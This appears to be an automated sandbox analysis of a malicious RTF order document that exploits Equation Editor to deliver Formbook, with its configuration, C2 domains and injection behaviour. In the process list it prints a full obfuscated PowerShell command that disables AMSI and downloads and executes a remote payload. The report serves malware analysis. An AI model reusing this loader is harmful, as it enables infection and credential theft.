Analysis
-
max time kernel
147s -
max time network
141s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
18-01-2021 07:54
Static task
static1
Behavioral task
behavioral1
Sample
Order No.428 1-18-2021 BA URUS BINA (M) SDN BHD.doc.rtf
Resource
win7v20201028
Behavioral task
behavioral2
Sample
Order No.428 1-18-2021 BA URUS BINA (M) SDN BHD.doc.rtf
Resource
win10v20201028
General
-
Target
Order No.428 1-18-2021 BA URUS BINA (M) SDN BHD.doc.rtf
-
Size
1.5MB
-
MD5
6afa446a78ee1e4003e2419c4b3ff648
-
SHA1
d8ab568179d3dae50e76e7ff0aa6ecb18da84377
-
SHA256
052c6dd23430c3cb18615febd286a20e4fbfdcaa66f45d00b0f8fa1d1e70d92b
-
SHA512
73b0d69a4a134ced282db75f0de06c426db87620bbddf8f030bd2658efe3cc5adf392a5a9ab9a3900b6820010eed2f6c227d2dd9e78121781e7967f3e6443ee2
Malware Config
Extracted
formbook
http://www.histasinsaat.com/lbn/
sanfordrubenstein.net
snehamsolutions.com
sinteredfilter.net
cabinetbernat.com
misatani.com
buttlickhollow.com
alkhatalaswadcomputer.com
odiamonds.jewelry
persentage.club
shesthemanunited.com
boxstaging.com
thetwelvepercentstore.com
mlwgsjabberwock.com
sportscardhq.com
philadelphiaartgallery.com
globalgambling.com
czwykj.com
dizivadi.com
emmaluther.com
searko.com
enjoyingitaly.com
savage-playground.com
startupyoursuccess.com
gokulmedia.com
jbhelpme.com
paranormalchronicle.com
xn--15t807d6kdfva.site
dailyroo.com
xn--3iqa8101avze.com
figandoliveco.com
megami-trading.com
crafit-mie.com
spankwirew.com
restoretherainbow.com
traceyirie.com
miebookfavorito.com
solarsuriname.com
luxeandwhite.com
shuazuan58.com
engakc.com
kitabimigetir.com
chesterchan.com
smartwatchspacespeed.com
ncmbwz.com
bangandmash.com
noon-bay.com
worldthamizhacademylibrary.com
cosmeticosacessorios.com
crying-in-the-castle.com
luminarstudio.info
vacationlandinsurance.com
singleboardcomputerexpo.com
littlemagicmachines.com
mulyanatamateknik.com
thelifeofpepperpoetrylovers.com
westernjeweler.com
kratompodcast.com
akirabacklondon.com
diamondpowerwashes.com
kianna.net
caterfl.com
michaelurbowiczart.com
variationsinvarnish.com
weyersonline.com
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1060 1592 Powershell.exe -
Formbook Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/1096-27-0x000000000041EC20-mapping.dmp formbook behavioral1/memory/1096-26-0x0000000000400000-0x000000000042E000-memory.dmp formbook behavioral1/memory/2004-37-0x0000000000080000-0x00000000000AE000-memory.dmp formbook -
Blocklisted process makes network request 4 IoCs
Processes:
Powershell.exeflow pid process 8 1060 Powershell.exe 10 1060 Powershell.exe 12 1060 Powershell.exe 14 1060 Powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
Powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk Powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
Powershell.execontrol.exeNAPSTAT.EXEdescription pid process target process PID 1060 set thread context of 1096 1060 Powershell.exe control.exe PID 1096 set thread context of 1276 1096 control.exe Explorer.EXE PID 1096 set thread context of 1276 1096 control.exe Explorer.EXE PID 2004 set thread context of 1276 2004 NAPSTAT.EXE Explorer.EXE -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Processes:
WINWORD.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1732 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 34 IoCs
Processes:
Powershell.execontrol.exeNAPSTAT.EXEpid process 1060 Powershell.exe 1060 Powershell.exe 1060 Powershell.exe 1060 Powershell.exe 1060 Powershell.exe 1060 Powershell.exe 1060 Powershell.exe 1060 Powershell.exe 1096 control.exe 1096 control.exe 1096 control.exe 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 1276 Explorer.EXE -
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
control.exeNAPSTAT.EXEpid process 1096 control.exe 1096 control.exe 1096 control.exe 1096 control.exe 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE -
Suspicious use of AdjustPrivilegeToken 49 IoCs
Processes:
Powershell.execontrol.exeNAPSTAT.EXEExplorer.EXEdescription pid process Token: SeDebugPrivilege 1060 Powershell.exe Token: SeIncreaseQuotaPrivilege 1060 Powershell.exe Token: SeSecurityPrivilege 1060 Powershell.exe Token: SeTakeOwnershipPrivilege 1060 Powershell.exe Token: SeLoadDriverPrivilege 1060 Powershell.exe Token: SeSystemProfilePrivilege 1060 Powershell.exe Token: SeSystemtimePrivilege 1060 Powershell.exe Token: SeProfSingleProcessPrivilege 1060 Powershell.exe Token: SeIncBasePriorityPrivilege 1060 Powershell.exe Token: SeCreatePagefilePrivilege 1060 Powershell.exe Token: SeBackupPrivilege 1060 Powershell.exe Token: SeRestorePrivilege 1060 Powershell.exe Token: SeShutdownPrivilege 1060 Powershell.exe Token: SeDebugPrivilege 1060 Powershell.exe Token: SeSystemEnvironmentPrivilege 1060 Powershell.exe Token: SeRemoteShutdownPrivilege 1060 Powershell.exe Token: SeUndockPrivilege 1060 Powershell.exe Token: SeManageVolumePrivilege 1060 Powershell.exe Token: 33 1060 Powershell.exe Token: 34 1060 Powershell.exe Token: 35 1060 Powershell.exe Token: SeIncreaseQuotaPrivilege 1060 Powershell.exe Token: SeSecurityPrivilege 1060 Powershell.exe Token: SeTakeOwnershipPrivilege 1060 Powershell.exe Token: SeLoadDriverPrivilege 1060 Powershell.exe Token: SeSystemProfilePrivilege 1060 Powershell.exe Token: SeSystemtimePrivilege 1060 Powershell.exe Token: SeProfSingleProcessPrivilege 1060 Powershell.exe Token: SeIncBasePriorityPrivilege 1060 Powershell.exe Token: SeCreatePagefilePrivilege 1060 Powershell.exe Token: SeBackupPrivilege 1060 Powershell.exe Token: SeRestorePrivilege 1060 Powershell.exe Token: SeShutdownPrivilege 1060 Powershell.exe Token: SeDebugPrivilege 1060 Powershell.exe Token: SeSystemEnvironmentPrivilege 1060 Powershell.exe Token: SeRemoteShutdownPrivilege 1060 Powershell.exe Token: SeUndockPrivilege 1060 Powershell.exe Token: SeManageVolumePrivilege 1060 Powershell.exe Token: 33 1060 Powershell.exe Token: 34 1060 Powershell.exe Token: 35 1060 Powershell.exe Token: SeDebugPrivilege 1096 control.exe Token: SeDebugPrivilege 2004 NAPSTAT.EXE Token: SeShutdownPrivilege 1276 Explorer.EXE Token: SeShutdownPrivilege 1276 Explorer.EXE Token: SeShutdownPrivilege 1276 Explorer.EXE Token: SeShutdownPrivilege 1276 Explorer.EXE Token: SeShutdownPrivilege 1276 Explorer.EXE Token: SeShutdownPrivilege 1276 Explorer.EXE -
Suspicious use of FindShellTrayWindow 6 IoCs
Processes:
Explorer.EXEpid process 1276 Explorer.EXE 1276 Explorer.EXE 1276 Explorer.EXE 1276 Explorer.EXE 1276 Explorer.EXE 1276 Explorer.EXE -
Suspicious use of SendNotifyMessage 6 IoCs
Processes:
Explorer.EXEpid process 1276 Explorer.EXE 1276 Explorer.EXE 1276 Explorer.EXE 1276 Explorer.EXE 1276 Explorer.EXE 1276 Explorer.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 1732 WINWORD.EXE 1732 WINWORD.EXE -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
EQNEDT32.EXECmD.exeWINWORD.EXEPowershell.exeExplorer.EXENAPSTAT.EXEdescription pid process target process PID 2036 wrote to memory of 1888 2036 EQNEDT32.EXE CmD.exe PID 2036 wrote to memory of 1888 2036 EQNEDT32.EXE CmD.exe PID 2036 wrote to memory of 1888 2036 EQNEDT32.EXE CmD.exe PID 2036 wrote to memory of 1888 2036 EQNEDT32.EXE CmD.exe PID 1888 wrote to memory of 1748 1888 CmD.exe cscript.exe PID 1888 wrote to memory of 1748 1888 CmD.exe cscript.exe PID 1888 wrote to memory of 1748 1888 CmD.exe cscript.exe PID 1888 wrote to memory of 1748 1888 CmD.exe cscript.exe PID 1732 wrote to memory of 1716 1732 WINWORD.EXE splwow64.exe PID 1732 wrote to memory of 1716 1732 WINWORD.EXE splwow64.exe PID 1732 wrote to memory of 1716 1732 WINWORD.EXE splwow64.exe PID 1732 wrote to memory of 1716 1732 WINWORD.EXE splwow64.exe PID 1060 wrote to memory of 1096 1060 Powershell.exe control.exe PID 1060 wrote to memory of 1096 1060 Powershell.exe control.exe PID 1060 wrote to memory of 1096 1060 Powershell.exe control.exe PID 1060 wrote to memory of 1096 1060 Powershell.exe control.exe PID 1060 wrote to memory of 1096 1060 Powershell.exe control.exe PID 1060 wrote to memory of 1096 1060 Powershell.exe control.exe PID 1060 wrote to memory of 1096 1060 Powershell.exe control.exe PID 1276 wrote to memory of 2004 1276 Explorer.EXE NAPSTAT.EXE PID 1276 wrote to memory of 2004 1276 Explorer.EXE NAPSTAT.EXE PID 1276 wrote to memory of 2004 1276 Explorer.EXE NAPSTAT.EXE PID 1276 wrote to memory of 2004 1276 Explorer.EXE NAPSTAT.EXE PID 2004 wrote to memory of 528 2004 NAPSTAT.EXE cmd.exe PID 2004 wrote to memory of 528 2004 NAPSTAT.EXE cmd.exe PID 2004 wrote to memory of 528 2004 NAPSTAT.EXE cmd.exe PID 2004 wrote to memory of 528 2004 NAPSTAT.EXE cmd.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Order No.428 1-18-2021 BA URUS BINA (M) SDN BHD.doc.rtf"2⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122883⤵
-
C:\Windows\SysWOW64\NAPSTAT.EXE"C:\Windows\SysWOW64\NAPSTAT.EXE"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\WINDOWS\syswow64\control.exe"3⤵
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\CmD.exeCmD.exe /C cscript %tmp%\Client.vbs AC2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cscript.execscript C:\Users\Admin\AppData\Local\Temp\Client.vbs AC3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$004425318001542020044253180015420200442531800154202004425318001542020044253180015420254433=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,49,68,55,56,53,70,50,56,53,67,61,36,49,68,55,56,53,70,50,56,53,67,61,87,114,105,116,101,45,72,111,115,116,32,39,69,67,52,65,65,66,53,56,48,56,50,50,51,69,66,55,50,50,70,57,67,50,48,54,51,69,68,48,53,54,54,54,53,65,65,56,48,65,67,53,54,53,56,70,57,68,48,54,56,49,53,55,50,48,55,53,57,67,51,69,66,52,67,52,66,55,48,54,53,55,50,52,67,51,68,69,70,65,54,51,68,69,66,53,56,70,67,51,70,65,57,68,50,50,49,50,49,54,55,52,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,54,55,54,56,48,65,69,49,54,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,54,55,54,56,48,65,69,49,54,59,36,69,55,68,69,65,56,68,66,48,51,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,69,55,68,69,65,56,68,66,48,51,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,56,48,48,52,52,49,57,49,49,51,50,55,52,53,55,51,48,49,47,56,48,48,52,52,50,53,51,49,56,48,48,49,53,52,50,48,50,47,112,114,111,106,101,99,116,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,69,55,68,69,65,56,68,66,48,51,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,69,55,68,69,65,56,68,66,48,51,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($004425318001542020044253180015420200442531800154202004425318001542020044253180015420254433)|I`E`X1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\WINDOWS\syswow64\control.exe"{path}"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Client.vbsMD5
1d90a2e70435572f9f4b6468f2ca12b0
SHA1af9b2d007aa2ae788eaba3cb4bc9bce7b05142f5
SHA256afb05ff8d35a39d5358bb58cedc47ebb3e487141fab9b7ec360cf65da5c9231d
SHA512148700cb7ab7f1c428159df1cf0ad37567e7a28743221e1ffdfb8ec52b52fb7361fae62c1d9629e81cd8b87d022b1960bd391bbd228b71856e0e184fc4564fa4
-
memory/528-35-0x0000000000000000-mapping.dmp
-
memory/1060-21-0x00000000024FA000-0x0000000002519000-memory.dmpFilesize
124KB
-
memory/1060-18-0x00000000022E0000-0x00000000022E1000-memory.dmpFilesize
4KB
-
memory/1060-25-0x000000001C6A0000-0x000000001C6E5000-memory.dmpFilesize
276KB
-
memory/1060-11-0x000007FEFBD61000-0x000007FEFBD63000-memory.dmpFilesize
8KB
-
memory/1060-20-0x000000001B710000-0x000000001B711000-memory.dmpFilesize
4KB
-
memory/1060-19-0x000000001B640000-0x000000001B641000-memory.dmpFilesize
4KB
-
memory/1060-12-0x000007FEF5690000-0x000007FEF607C000-memory.dmpFilesize
9.9MB
-
memory/1060-13-0x0000000002410000-0x0000000002411000-memory.dmpFilesize
4KB
-
memory/1060-14-0x000000001AB30000-0x000000001AB31000-memory.dmpFilesize
4KB
-
memory/1060-15-0x0000000002700000-0x0000000002701000-memory.dmpFilesize
4KB
-
memory/1060-16-0x00000000024F0000-0x00000000024F2000-memory.dmpFilesize
8KB
-
memory/1060-17-0x00000000024F4000-0x00000000024F6000-memory.dmpFilesize
8KB
-
memory/1068-22-0x000007FEF7800000-0x000007FEF7A7A000-memory.dmpFilesize
2.5MB
-
memory/1096-32-0x00000000003D0000-0x00000000003E4000-memory.dmpFilesize
80KB
-
memory/1096-30-0x0000000000390000-0x00000000003A4000-memory.dmpFilesize
80KB
-
memory/1096-29-0x0000000000700000-0x0000000000A03000-memory.dmpFilesize
3.0MB
-
memory/1096-26-0x0000000000400000-0x000000000042E000-memory.dmpFilesize
184KB
-
memory/1096-27-0x000000000041EC20-mapping.dmp
-
memory/1276-31-0x0000000004940000-0x0000000004A37000-memory.dmpFilesize
988KB
-
memory/1276-41-0x0000000004F40000-0x0000000004FE9000-memory.dmpFilesize
676KB
-
memory/1276-33-0x0000000006CA0000-0x0000000006E46000-memory.dmpFilesize
1.6MB
-
memory/1716-23-0x0000000000000000-mapping.dmp
-
memory/1732-4-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1732-40-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1732-3-0x0000000070391000-0x0000000070393000-memory.dmpFilesize
8KB
-
memory/1732-2-0x0000000072911000-0x0000000072914000-memory.dmpFilesize
12KB
-
memory/1748-10-0x0000000002740000-0x0000000002744000-memory.dmpFilesize
16KB
-
memory/1748-7-0x0000000000000000-mapping.dmp
-
memory/1888-6-0x0000000000000000-mapping.dmp
-
memory/2004-36-0x0000000000FF0000-0x0000000001036000-memory.dmpFilesize
280KB
-
memory/2004-37-0x0000000000080000-0x00000000000AE000-memory.dmpFilesize
184KB
-
memory/2004-38-0x0000000000BB0000-0x0000000000EB3000-memory.dmpFilesize
3.0MB
-
memory/2004-39-0x00000000008E0000-0x0000000000973000-memory.dmpFilesize
588KB
-
memory/2004-34-0x0000000000000000-mapping.dmp
-
memory/2036-5-0x0000000075AE1000-0x0000000075AE3000-memory.dmpFilesize
8KB